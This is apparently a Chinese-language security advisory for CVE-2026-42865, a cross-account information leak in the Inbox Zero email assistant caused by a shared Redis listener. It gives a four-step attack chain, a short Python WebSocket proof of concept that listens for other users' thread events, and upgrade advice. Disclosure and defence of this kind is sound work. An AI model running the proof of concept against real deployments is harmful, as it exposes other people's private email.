CVE-2026-42865 CVSS 4.3 中危

CVE-2026-42865: Inbox Zero 跨账号信息泄露漏洞

披露日期: 2026-05-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42865

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Inbox Zero

漏洞概述

Inbox Zero是一款AI电子邮件个人助理。在2.29.3版本之前，其邮件清理流端点使用了共享的Redis订阅监听器。这导致当多个认证账户同时使用清理功能时，一个账户的线程事件可能会被发送到另一个认证账户。攻击者利用此漏洞可以获取其他用户的邮件线程数据，造成敏感信息泄露。该问题已在2.29.3版本中修复。

技术细节

该漏洞的根本原因在于Inbox Zero在处理实时邮件清理流时，未正确隔离不同用户上下文之间的Redis订阅通道。系统使用了一个共享的Redis订阅监听器来分发邮件线程事件。当两个或以上经过身份认证的用户同时触发“cleaner”功能时，后端服务在广播事件时未严格验证当前WebSocket连接或请求上下文与目标事件所有者的归属关系。由于监听器是共享的，事件数据可能会被错误地路由至当前活跃的另一个用户会话中。这种竞态条件或资源复用缺陷允许低权限攻击者在无需额外交互的情况下，被动接收或主动探测到其他用户的邮件线程内容，从而破坏了数据的机密性。

攻击链分析

STEP 1

侦察与注册

攻击者确认目标使用的是存在漏洞的Inbox Zero版本（< 2.29.3），并注册一个低权限账户。

STEP 2

建立连接

攻击者登录账户，并连接到“cleaner”邮件流端点，开启Redis订阅监听。

STEP 3

触发并发

攻击者等待其他用户（或使用第二个账号）同时触发邮件清理功能，导致系统产生事件流。

STEP 4

数据截获

由于共享Redis监听器缺陷，攻击者的连接接收到属于其他用户的邮件线程事件数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets

# Proof of Concept for CVE-2026-42865
# This script simulates connecting to the vulnerable stream endpoint.
# Due to the shared Redis subscription listener, data leakage occurs
# when multiple authenticated users interact with the cleaner feature simultaneously.

async def victim_stream_listener(stream_url, auth_token):
    headers = {"Authorization": f"Bearer {auth_token}"}
    async with websockets.connect(stream_url, extra_headers=headers) as websocket:
        print(f"[*] Connected to stream as {auth_token[:10]}...")
        while True:
            try:
                message = await websocket.recv()
                # In the vulnerable version, this message might contain
                # thread events belonging to a different user.
                print(f"[!] Received Event: {message}")
            except Exception as e:
                print(f"Error: {e}")
                break

# Usage:
# Attacker initiates two connections with different user tokens.
# Trigger the 'cleaner' action on one account and observe data leakage
# in the other connection's stream.
# TARGET_URL = "wss://inbox-zero-app.com/api/stream/cleaner"
# asyncio.run(victim_stream_listener(TARGET_URL, "ATTACKER_TOKEN"))

影响范围

Inbox Zero < 2.29.3

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应临时禁用“cleaner”邮件清理功能，以防止数据跨账号泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表